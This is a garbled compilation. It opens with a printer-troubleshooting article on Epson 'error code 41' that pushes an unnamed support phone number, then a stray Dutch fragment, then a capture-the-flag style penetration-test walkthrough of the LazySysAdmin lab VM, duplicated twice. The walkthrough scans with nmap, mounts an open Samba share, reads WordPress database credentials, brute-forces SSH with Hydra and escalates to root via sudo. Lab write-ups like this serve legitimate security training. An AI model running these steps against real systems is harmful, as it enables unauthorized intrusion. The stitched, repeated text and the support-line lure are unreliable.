How to Troubleshoot Epson Printer Not Activated Error Code 41?

Nowadays, people rely on the printers for professional tasks. Printers are delicate devices which transforms the soft copy into hard copy. There are lots of printer brands available in the market and among which, Epson is considered as the leading printer brand due to its distinct features and unparallel features. Epson printers are highly credible and reliable. However, like other technical devices sometimes, it also suffers from various issues, such as Printer Not Activated Error Code 41. Generally, this error happens when the printer is first accessed after the system boots. In this article, you will learn how to troubleshoot Epson printer not activated error code 41. In case of any query or issue, contact Epson Printer Support.

Steps to Epson Printer Not Activated Error Code 41

·         Fix System Mistakes: - At times, mistakes in the operating system can trigger this issue on your system with “Unactivated printer, error code 41.” This issue indicates that there are some problems with either driver in the PC related to printer or the problem of registry files that are related to the printer. If there is a problem in the registry then you need to check with the registry cleaner software. If the problem is with the Operating system, then you have to correct it with the system recovery or resetting the operating system.

·         Check the Setup of Printers: - Failure to configure printer-related environments may also give rise to this issue. This issue can also occur if the chosen printer is not set as the default printer to execute the printing jobs. If you are getting the message “Unactivated Printer Error 41”, then you should inspect the printer configuration and restart the system background printer spooled service. This can be done using the printers and fax option in the Start menu and to restart the service using the services.msc instruction under Run.

·         Drivers Re-install: - Damage or corruption of the system installed printer drivers can also be the cause behind occurrence of this error. If you are experiencing this issue, then you need to use the device manager to fully remove the printer drivers mounted on the system and then reinstall the printer drivers.

These are some ways to fix Epson Printer not activated error code 41. However, if you have encountered any problem at any steps, then dial Epson Printer Help Number for solution.

Source URL http://www.articleted.com/article/155096/25240/How-to-Troubleshoot-Epson-Printer-Not-Activated-Error-Code-41-

Schade of corruptie van de in het systeem geïnstalleerde printerdrivers kan ook leiden tot

'Epson Printer Not Activated Error Code 41. Gebruikers met dit probleem moeten

apparaatbeheer gebruiken om de op het systeem gemonteerde printerdrivers volledig te

verwijderen en vervolgens de printerdrivers opnieuw te installeren.

Penetration Test Training – LazySysAdmin: 1 (vanilla style)

and Kai Herings

Good morning everyone…

Today we’re going to start out training session with a fairly decent image from vulnhub.com – LazySysAdmin: 1. To use this image, just download, unzip and throw it against a running virtualbox. Just be sure to create a host-only network beforehand, so we can find the virtual machine. The system itself will get an IP Adress via DHCP on this network. We’re using vboxnet4 (192.168.60.0/24) here, so just adapt this to your networking. We are also working on a macOS 10.3, so be sure to adapt the used tools to your environment. We used the following tools:

netdiscover

nmap

dirb

THC hydra

If you want to install these tools with Homebrew, just tap brew tap feffi/homebrew-pentest.

$ brew tap feffi/homebrew-pentest

Everything up? OK, let’s start.

Meanwhile somewhere in outer space…

$ sudo netdiscover -i vboxnet4 -f -r 192.168.60.0/24

Currently scanning: Finished! | Our Mac is: DE:AD:BE:EF:DE:AD - 0 1 Captured ARP Req/Rep packets, from 1 hosts. Total size: 1 _________________________________________________________________ IP At MAC Address Count Len MAC Vendor ----------------------------------------------------------------- 192.168.60.2 08:00:27:6d:95:4e 1 60 Unknown vendor

Ah, right, 192.168.60.2, thats fine. For the sake of reusing this IP in our tasks, we just shorten it a bit:

$ export ip="192.168.60.2" $ echo $ip

Nice, let’s start a common scanning for services:

$ nmap -sV -sC $ip

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:20 CET Nmap scan report for 192.168.60.2 Host is up (1.0s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA) | 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA) | 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA) |_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-generator: Silex v2.2.7 | http-robots.txt: 4 disallowed entries |_/old/ /test/ /TR2/ /Backnode_files/ |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Backnode 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 3306/tcp open mysql MySQL (unauthorized) 6667/tcp open irc InspIRCd | irc-info: | server: Admin.local | users: 1 | servers: 1 | chans: 0 | lusers: 1 | lservers: 0 | source ident: nmap | source host: 192.168.60.1 |_ error: Closing link: ([email protected]) [Client exited] Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 59m57s, deviation: 0s, median: 59m57s |_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: , NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: lazysysadmin | NetBIOS computer name: LAZYSYSADMIN\x00 | Domain name: \x00 | FQDN: lazysysadmin |_ System time: 2017-11-05T00:22:19+10:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2017-11-04 15:22:19 |_ start_date: 1601-01-01 00:53:28

Ok, that’s a lot of surface to cover. Let’s start with the laziest type of service: Samba. As we can see the account guest is authenticated as user, that ist nice. Before we continue, we note down everything that might be a username or password:

$ echo "TR2" >> login.txt $ echo "guest" >> login.txt $ echo "LAZYSYSADMIN" >> login.txt $ echo "lazysysadmin" >> login.txt $ echo "x00" >> login.txt

Let’s chat…

Having a look a the irc deamon …

$ telnet 192.168.60.2 6667 Escape character is '^]' :Admin.local NOTICE Auth :*** Looking up your hostname...  >>PASS none :Admin.local NOTICE Auth :*** Could not resolve your hostname: Request timed out; using your IP address (192.168.56.1) instead. >>NICK Bla >>USER blah blah blah blah :Admin.local NOTICE Auth :Welcome to Localnet! :Admin.local 001 Bla :Welcome to the Localnet IRC Network [email protected] :Admin.local 002 Bla :Your host is Admin.local, running version InspIRCd-2.0 :Admin.local 003 Bla :This server was created 14:52:33 Mar 29 2016 :Admin.local 004 Bla Admin.local InspIRCd-2.0 iosw biklmnopstv bklov :Admin.local 005 Bla AWAYLEN=201 CASEMAPPING=rfc1459 CHANMODES=b,k,l,imnpst CHANTYPES=# CHARSET=ascii ELIST=MU FNC KICKLEN=256 MAP MAXBANS=60 MAXCHANNELS=20 MAXPARA=32 MAXTARGETS=20 :are supported by this server :Admin.local 005 Bla MODES=20 NETWORK=Localnet NICKLEN=33 PREFIX=(ov)@+ STATUSMSG=@+ TOPICLEN=308 VBANLIST WALLCHOPS WALLVOICES :are supported by this server :Admin.local 042 Bla 690AAAAAD :your unique I :Admin.local 375 Bla :Admin.local message of the day :Admin.local 372 Bla :- Please edit /etc/inspircd/mot :Admin.local 376 Bla :End of message of the day. :Admin.local 251 Bla :There are 1 users and 0 invisible on 1 servers :Admin.local 254 Bla 0 :channels formed :Admin.local 255 Bla :I have 1 clients and 0 servers :Admin.local 265 Bla :Current Local Users: 1  Max: 1 :Admin.local 266 Bla :Current Global Users: 1  Max: 1

Checking for weaknesses on InspIRCd-2.0 … only DoS and spoofing, no remote access known. Let’s walk on to the next.

Samba, Samba, olê…

Now we can enumerate the Samba shares as guest:

$ nmap -sV --script=smb-enum-shares -p445 $ip

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:25 CET Nmap scan report for 192.168.60.2 Host is up (0.00054s latency). PORT STATE SERVICE VERSION 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) Service Info: Host: LAZYSYSADMIN Host script results: | smb-enum-shares: | account_used: guest | \\192.168.60.2\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (Web server) | Users: 1 | Max Users: | Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\192.168.60.2\print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: | Path: C:\var\lib\samba\printers | Anonymous access: | Current user access: | \\192.168.60.2\share$: | Type: STYPE_DISKTREE | Comment: Sumshare | Users: 0 | Max Users: | Path: C:\var\www\html\ | Anonymous access: READ/WRITE |_ Current user access: READ/WRITE

Oh, nice! A guest writeable directory. Maybe we can snoop around…

$ mkdir share $ mount_smbfs //guest:@192.168.60.2/share$ share $ cd share $ tree -L 2 .

. ├── Backnode_files │   ├── AAEAAQAAAAAAAAdJAAAAJDhiNGY1YTk3LTQ3NTctNDE1Ny1hZmU4LTlhMWE4.jpg │   ├── failure-good-thing-fixed.png │   ├── front-end.css │   ├── front-end.js │   ├── jquery-ui.js │   ├── jquery.js │   ├── logo.png │   ├── normalize.css │   ├── pageable.js │   ├── picto1.png │   ├── picto2.png │   ├── picto3.png │   ├── script.json │   ├── styles.css │   └── tumblr_lb4pi2yt1C1qb2xivo1_500.gif ├── apache ├── deets.txt ├── index.html ├── info.php ├── old ├── robots.txt ├── test ├── todolist.txt ├── wordpress │   ├── index.php │   ├── license.txt │   ├── readme.html │   ├── wp-activate.php │   ├── wp-admin │   ├── wp-blog-header.php │   ├── wp-comments-post.php │   ├── wp-config-sample.php │   ├── wp-config.php │   ├── wp-content │   ├── wp-cron.php │   ├── wp-includes │   ├── wp-links-opml.php │   ├── wp-load.php │   ├── wp-login.php │   ├── wp-mail.php │   ├── wp-settings.php │   ├── wp-signup.php │   ├── wp-trackback.php │   └── xmlrpc.php └── wp

Really? A wordpress installation! Let us check this first.

$ cat wordpress/wp-config.php | grep DB_USER define('DB_USER', 'Admin'); $ cat wordpress/wp-config.php | grep DB_PASSWORD define('DB_PASSWORD', 'TogieMYSQL12345^^'); $ cat wordpress/wp-config.php | grep DB_NAME define('DB_NAME', 'wordpress');

Noted! We got our first username/password combination.

$ echo "deets" >> login.txt $ echo "Admin" >> login.txt $ echo "admin" >> login.txt $ echo "TogieMYSQL12345^^" >> login.txt $ echo "Togie" >> login.txt $ echo "togie" >> login.txt

What else do we get here?

$ cat deets.txt

CBF Remembering all these passwords. Remember to remove this file and update your password after we push out the server. Password 12345

$ echo "CBF" >> login.txt $ echo "12345" >> login.txt

Yeah…sure…we updated it.

$ cat todolist.txt

Prevent users from being able to view to web root using the local file browser

Done. So we got some stuff here, but where to put it?

Land of the Apache

Maybe we should enumerate a little further. We got an website listening on port 80. Spider that:

$ dirb http://$ip

----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sat Nov 4 14:38:59 2017 URL_BASE: http://192.168.60.2/ WORDLIST_FILES: /usr/local/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.60.2/ ---- ==> DIRECTORY: http://ift.tt/2hvafiO + http://ift.tt/2jlanBV (CODE:200|SIZE:36072) + http://ift.tt/2hw2XeJ (CODE:200|SIZE:77236) ==> DIRECTORY: http://ift.tt/2jlao8X ==> DIRECTORY: http://ift.tt/2hyB3OZ ==> DIRECTORY: http://ift.tt/2jnXDu5 + http://ift.tt/2htorZo (CODE:200|SIZE:92) + http://ift.tt/2jkJEoX (CODE:403|SIZE:292) ==> DIRECTORY: http://ift.tt/2hwIiXI ==> DIRECTORY: http://ift.tt/2jlv7cQ ==> DIRECTORY: http://192.168.60.2/wp/ ... (lots of output)

Ok, by the time dirb is running we got some interesting directories to look at:

http://ift.tt/2hvafiO

http://ift.tt/2hw2XeJ

http://ift.tt/2jnXDu5

http://ift.tt/2jlv7cQ

And some more. We’ve already seen those in the samba-enumeration. Lets try our wordpress then…

$ curl -v http://ift.tt/2jlv7cQ

...   My name is togie. My name is togie. My name is togie. My name is togie. ...

mhhh that togie again…mhhh, maybe…we can try ssh…

Serpentine water monster

let us try our already filled login list

$ hydra -t 4 -L login.txt -P login.txt ssh://$ip

Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://ift.tt/1cTCuIN) starting at 2017-11-04 20:35:23 [DATA] max 4 tasks per 1 server, overall 4 tasks, 169 login tries (l:13/p:13), ~43 tries per task [DATA] attacking ssh://192.168.60.2:22/ [STATUS] 128.00 tries/min, 128 tries in 00:01h, 41 to do in 00:01h, 4 active [22][ssh] host: 192.168.60.2 login: togie password: 12345 1 of 1 target successfully completed, 1 valid password found Hydra (http://ift.tt/1cTCuIN) finished at 2017-11-04 20:36:42

Nice! So we login using togie and password 12345

$ ssh togie@$ip

################################################################################################## # Welcome to Web_TR1 # # All connections are monitored and recorded # # Disconnect IMMEDIATELY if you are not an authorized user! # ################################################################################################## [email protected]'s password: 12345

Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686) * Documentation: http://ift.tt/ABdZxn System information as of Sun Nov 5 02:24:33 AEST 2017 System load: 0.0 Processes: 177 Usage of /: 48.5% of 2.89GB Users logged in: 0 Memory usage: 31% IP address for eth0: 192.168.60.2 Swap usage: 0% Graph this data and manage this system at: http://ift.tt/XlAX5B 133 packages can be updated. 0 updates are security updates. togie@LazySysAdmin:~$

So we got a shell. Let’s enumerate further.

togie@LazySysAdmin:~$ id

uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)

We got sudo…

Flag

$ sudo su - [sudo] password for togie: 12345

root@LazySysAdmin:~# ls -al

total 28 drwx------ 3 root root 4096 Aug 15 23:10 ./ drwxr-xr-x 22 root root 4096 Aug 21 20:10 ../ -rw------- 1 root root 1050 Nov 3 14:45 .bash_history -rw-r--r-- 1 root root 3106 Feb 20 2014 .bashrc drwx------ 2 root root 4096 Aug 14 20:30 .cache/ -rw-r--r-- 1 root root 140 Feb 20 2014 .profile -rw-r--r-- 1 root root 347 Aug 21 19:35 proof.txt

Gotcha!

$ cat proof.txt

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851 Well done :) Hope you learn't a few things along the way. Regards, Togie Mcdogie Enjoy some random strings WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851 2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7 pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02 bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu

  The post Penetration Test Training – LazySysAdmin: 1 (vanilla style) appeared first on codecentric AG Blog.

Penetration Test Training – LazySysAdmin: 1 (vanilla style) published first on http://ift.tt/2fA8nUr

Penetration Test Training – LazySysAdmin: 1 (vanilla style)

and Kai Herings

Good morning everyone…

Today we’re going to start out training session with a fairly decent image from vulnhub.com – LazySysAdmin: 1. To use this image, just download, unzip and throw it against a running virtualbox. Just be sure to create a host-only network beforehand, so we can find the virtual machine. The system itself will get an IP Adress via DHCP on this network. We’re using vboxnet4 (192.168.60.0/24) here, so just adapt this to your networking. We are also working on a macOS 10.3, so be sure to adapt the used tools to your environment. We used the following tools:

netdiscover

nmap

dirb

THC hydra

If you want to install these tools with Homebrew, just tap brew tap feffi/homebrew-pentest.

$ brew tap feffi/homebrew-pentest

Everything up? OK, let’s start.

Meanwhile somewhere in outer space…

$ sudo netdiscover -i vboxnet4 -f -r 192.168.60.0/24

Currently scanning: Finished! | Our Mac is: DE:AD:BE:EF:DE:AD - 0 1 Captured ARP Req/Rep packets, from 1 hosts. Total size: 1 _________________________________________________________________ IP At MAC Address Count Len MAC Vendor ----------------------------------------------------------------- 192.168.60.2 08:00:27:6d:95:4e 1 60 Unknown vendor

Ah, right, 192.168.60.2, thats fine. For the sake of reusing this IP in our tasks, we just shorten it a bit:

$ export ip="192.168.60.2" $ echo $ip

Nice, let’s start a common scanning for services:

$ nmap -sV -sC $ip

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:20 CET Nmap scan report for 192.168.60.2 Host is up (1.0s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA) | 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA) | 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA) |_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-generator: Silex v2.2.7 | http-robots.txt: 4 disallowed entries |_/old/ /test/ /TR2/ /Backnode_files/ |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Backnode 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 3306/tcp open mysql MySQL (unauthorized) 6667/tcp open irc InspIRCd | irc-info: | server: Admin.local | users: 1 | servers: 1 | chans: 0 | lusers: 1 | lservers: 0 | source ident: nmap | source host: 192.168.60.1 |_ error: Closing link: ([email protected]) [Client exited] Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 59m57s, deviation: 0s, median: 59m57s |_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: , NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: lazysysadmin | NetBIOS computer name: LAZYSYSADMIN\x00 | Domain name: \x00 | FQDN: lazysysadmin |_ System time: 2017-11-05T00:22:19+10:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2017-11-04 15:22:19 |_ start_date: 1601-01-01 00:53:28

Ok, that’s a lot of surface to cover. Let’s start with the laziest type of service: Samba. As we can see the account guest is authenticated as user, that ist nice. Before we continue, we note down everything that might be a username or password:

$ echo "TR2" >> login.txt $ echo "guest" >> login.txt $ echo "LAZYSYSADMIN" >> login.txt $ echo "lazysysadmin" >> login.txt $ echo "x00" >> login.txt

Let’s chat…

Having a look a the irc deamon …

$ telnet 192.168.60.2 6667 Escape character is '^]' :Admin.local NOTICE Auth :*** Looking up your hostname...  >>PASS none :Admin.local NOTICE Auth :*** Could not resolve your hostname: Request timed out; using your IP address (192.168.56.1) instead. >>NICK Bla >>USER blah blah blah blah :Admin.local NOTICE Auth :Welcome to Localnet! :Admin.local 001 Bla :Welcome to the Localnet IRC Network [email protected] :Admin.local 002 Bla :Your host is Admin.local, running version InspIRCd-2.0 :Admin.local 003 Bla :This server was created 14:52:33 Mar 29 2016 :Admin.local 004 Bla Admin.local InspIRCd-2.0 iosw biklmnopstv bklov :Admin.local 005 Bla AWAYLEN=201 CASEMAPPING=rfc1459 CHANMODES=b,k,l,imnpst CHANTYPES=# CHARSET=ascii ELIST=MU FNC KICKLEN=256 MAP MAXBANS=60 MAXCHANNELS=20 MAXPARA=32 MAXTARGETS=20 :are supported by this server :Admin.local 005 Bla MODES=20 NETWORK=Localnet NICKLEN=33 PREFIX=(ov)@+ STATUSMSG=@+ TOPICLEN=308 VBANLIST WALLCHOPS WALLVOICES :are supported by this server :Admin.local 042 Bla 690AAAAAD :your unique I :Admin.local 375 Bla :Admin.local message of the day :Admin.local 372 Bla :- Please edit /etc/inspircd/mot :Admin.local 376 Bla :End of message of the day. :Admin.local 251 Bla :There are 1 users and 0 invisible on 1 servers :Admin.local 254 Bla 0 :channels formed :Admin.local 255 Bla :I have 1 clients and 0 servers :Admin.local 265 Bla :Current Local Users: 1  Max: 1 :Admin.local 266 Bla :Current Global Users: 1  Max: 1

Checking for weaknesses on InspIRCd-2.0 … only DoS and spoofing, no remote access known. Let’s walk on to the next.

Samba, Samba, olê…

Now we can enumerate the Samba shares as guest:

$ nmap -sV --script=smb-enum-shares -p445 $ip

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:25 CET Nmap scan report for 192.168.60.2 Host is up (0.00054s latency). PORT STATE SERVICE VERSION 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) Service Info: Host: LAZYSYSADMIN Host script results: | smb-enum-shares: | account_used: guest | \\192.168.60.2\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (Web server) | Users: 1 | Max Users: | Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\192.168.60.2\print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: | Path: C:\var\lib\samba\printers | Anonymous access: | Current user access: | \\192.168.60.2\share$: | Type: STYPE_DISKTREE | Comment: Sumshare | Users: 0 | Max Users: | Path: C:\var\www\html\ | Anonymous access: READ/WRITE |_ Current user access: READ/WRITE

Oh, nice! A guest writeable directory. Maybe we can snoop around…

$ mkdir share $ mount_smbfs //guest:@192.168.60.2/share$ share $ cd share $ tree -L 2 .

. ├── Backnode_files │   ├── AAEAAQAAAAAAAAdJAAAAJDhiNGY1YTk3LTQ3NTctNDE1Ny1hZmU4LTlhMWE4.jpg │   ├── failure-good-thing-fixed.png │   ├── front-end.css │   ├── front-end.js │   ├── jquery-ui.js │   ├── jquery.js │   ├── logo.png │   ├── normalize.css │   ├── pageable.js │   ├── picto1.png │   ├── picto2.png │   ├── picto3.png │   ├── script.json │   ├── styles.css │   └── tumblr_lb4pi2yt1C1qb2xivo1_500.gif ├── apache ├── deets.txt ├── index.html ├── info.php ├── old ├── robots.txt ├── test ├── todolist.txt ├── wordpress │   ├── index.php │   ├── license.txt │   ├── readme.html │   ├── wp-activate.php │   ├── wp-admin │   ├── wp-blog-header.php │   ├── wp-comments-post.php │   ├── wp-config-sample.php │   ├── wp-config.php │   ├── wp-content │   ├── wp-cron.php │   ├── wp-includes │   ├── wp-links-opml.php │   ├── wp-load.php │   ├── wp-login.php │   ├── wp-mail.php │   ├── wp-settings.php │   ├── wp-signup.php │   ├── wp-trackback.php │   └── xmlrpc.php └── wp

Really? A wordpress installation! Let us check this first.

$ cat wordpress/wp-config.php | grep DB_USER define('DB_USER', 'Admin'); $ cat wordpress/wp-config.php | grep DB_PASSWORD define('DB_PASSWORD', 'TogieMYSQL12345^^'); $ cat wordpress/wp-config.php | grep DB_NAME define('DB_NAME', 'wordpress');

Noted! We got our first username/password combination.

$ echo "deets" >> login.txt $ echo "Admin" >> login.txt $ echo "admin" >> login.txt $ echo "TogieMYSQL12345^^" >> login.txt $ echo "Togie" >> login.txt $ echo "togie" >> login.txt

What else do we get here?

$ cat deets.txt

CBF Remembering all these passwords. Remember to remove this file and update your password after we push out the server. Password 12345

$ echo "CBF" >> login.txt $ echo "12345" >> login.txt

Yeah…sure…we updated it.

$ cat todolist.txt

Prevent users from being able to view to web root using the local file browser

Done. So we got some stuff here, but where to put it?

Land of the Apache

Maybe we should enumerate a little further. We got an website listening on port 80. Spider that:

$ dirb http://$ip

----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sat Nov 4 14:38:59 2017 URL_BASE: http://192.168.60.2/ WORDLIST_FILES: /usr/local/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.60.2/ ---- ==> DIRECTORY: http://ift.tt/2hvafiO + http://ift.tt/2jlanBV (CODE:200|SIZE:36072) + http://ift.tt/2hw2XeJ (CODE:200|SIZE:77236) ==> DIRECTORY: http://ift.tt/2jlao8X ==> DIRECTORY: http://ift.tt/2hyB3OZ ==> DIRECTORY: http://ift.tt/2jnXDu5 + http://ift.tt/2htorZo (CODE:200|SIZE:92) + http://ift.tt/2jkJEoX (CODE:403|SIZE:292) ==> DIRECTORY: http://ift.tt/2hwIiXI ==> DIRECTORY: http://ift.tt/2jlv7cQ ==> DIRECTORY: http://192.168.60.2/wp/ ... (lots of output)

Ok, by the time dirb is running we got some interesting directories to look at:

http://ift.tt/2hvafiO

http://ift.tt/2hw2XeJ

http://ift.tt/2jnXDu5

http://ift.tt/2jlv7cQ

And some more. We’ve already seen those in the samba-enumeration. Lets try our wordpress then…

$ curl -v http://ift.tt/2jlv7cQ

...   My name is togie. My name is togie. My name is togie. My name is togie. ...

mhhh that togie again…mhhh, maybe…we can try ssh…

Serpentine water monster

let us try our already filled login list

$ hydra -t 4 -L login.txt -P login.txt ssh://$ip

Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://ift.tt/1cTCuIN) starting at 2017-11-04 20:35:23 [DATA] max 4 tasks per 1 server, overall 4 tasks, 169 login tries (l:13/p:13), ~43 tries per task [DATA] attacking ssh://192.168.60.2:22/ [STATUS] 128.00 tries/min, 128 tries in 00:01h, 41 to do in 00:01h, 4 active [22][ssh] host: 192.168.60.2 login: togie password: 12345 1 of 1 target successfully completed, 1 valid password found Hydra (http://ift.tt/1cTCuIN) finished at 2017-11-04 20:36:42

Nice! So we login using togie and password 12345

$ ssh togie@$ip

################################################################################################## # Welcome to Web_TR1 # # All connections are monitored and recorded # # Disconnect IMMEDIATELY if you are not an authorized user! # ################################################################################################## [email protected]'s password: 12345

Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686) * Documentation: http://ift.tt/ABdZxn System information as of Sun Nov 5 02:24:33 AEST 2017 System load: 0.0 Processes: 177 Usage of /: 48.5% of 2.89GB Users logged in: 0 Memory usage: 31% IP address for eth0: 192.168.60.2 Swap usage: 0% Graph this data and manage this system at: http://ift.tt/XlAX5B 133 packages can be updated. 0 updates are security updates. togie@LazySysAdmin:~$

So we got a shell. Let’s enumerate further.

togie@LazySysAdmin:~$ id

uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)

We got sudo…

Flag

$ sudo su - [sudo] password for togie: 12345

root@LazySysAdmin:~# ls -al

total 28 drwx------ 3 root root 4096 Aug 15 23:10 ./ drwxr-xr-x 22 root root 4096 Aug 21 20:10 ../ -rw------- 1 root root 1050 Nov 3 14:45 .bash_history -rw-r--r-- 1 root root 3106 Feb 20 2014 .bashrc drwx------ 2 root root 4096 Aug 14 20:30 .cache/ -rw-r--r-- 1 root root 140 Feb 20 2014 .profile -rw-r--r-- 1 root root 347 Aug 21 19:35 proof.txt

Gotcha!

$ cat proof.txt

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851 Well done :) Hope you learn't a few things along the way. Regards, Togie Mcdogie Enjoy some random strings WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851 2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7 pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02 bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu

  The post Penetration Test Training – LazySysAdmin: 1 (vanilla style) appeared first on codecentric AG Blog.

Penetration Test Training – LazySysAdmin: 1 (vanilla style) published first on http://ift.tt/2vCN0WJ